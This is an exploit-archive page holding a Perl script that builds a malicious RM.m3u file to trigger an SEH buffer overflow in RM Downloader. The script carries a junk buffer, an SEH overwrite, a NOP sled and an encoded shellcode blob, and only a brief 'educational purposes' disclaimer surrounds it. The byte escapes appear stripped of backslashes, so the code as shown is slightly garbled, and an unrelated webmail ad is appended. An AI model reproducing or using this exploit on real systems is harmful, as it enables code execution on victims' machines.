Home / os / winme

rmdownloaderm3u-overflow.txt

Posted on 20 January 2010

#RM Downloader m3u Buffer Overflow (SEH) (Perl Edition )
#Discovered by ::> Peter Van Eeckhoutte ( VERY BIG GREETZ TO HIM ) ;-)
#Written by Jacky
#All Greetz for Peter Van Eeckhoutte and Corelan Team !!!
#I tried to exploit it by a Direct Ret , but on my system , it doesn't seem that it's a Direct
#Ret Vulnerability , so i tried by SEH and Voila !
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
my $file="RM.m3u";
my $junk="A"x35059;
my $nseh="xebx1ex90x90";
my $seh="x1FxEAx02x10"; # 0x1002EA1F::> Thanks for Peter who gave me this
#address and it worked Perfectly ;-)
#This Address works too ::> 0x01DD1111
my $nops="x90"x25;
my $esp="xbfx1bxafxd9xd2x2bxc9xb1x24xdbxdaxd9x74x24xf4x5b".
"x31x7bx0ex83xebxfcx03x60xa5x3bx27x6ax51xffxc8x92".
"xa2x8bx8cxaex29xf7x0bxb6x2cxe7x9fx09x37x7cxc0xb5".
"x46x69xb6x3ex7cxe6x48xaex4cx38xd3x82x2bx78x90xdd".
"xf2xb3x54xe0x36xa8x93xd9xe2x0bx58x68xeexdfx3fxb6".
"xf1x34xd9x3dxfdx81xadx1exe2x14x59x2bx06x9cx9cxc0".
"xbexfexbax12x02xcfx02x7ex0fx70xb3xfbxcfx09xbfx88".
"x90xe5x34xfex0cx5bxc1x96x24x48xdfxedxb5x3exe0xf1".
"xb5xb5x89xcdxeaxf8xbfx4dx43x72xc7x0exabxffx68x78".
"xdcx8ax8dx27x74x13x73x5dx8ax74x73x86xf0x1bxe7x2b".
"xd9xbex8fxcex25";

my $junk2="A"x5000;
my $payload=$junk.$nseh.$seh.$nops.$esp.$junk2;


open(INI,">$file");
print INI $payload;
print "[+]File Created Successfully!
";
print "[+]Done!
";
close(INI);


________________________________
Windows Live: Make it easier for your friends to see what you’re up to on Facebook.<http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009>

 

TOP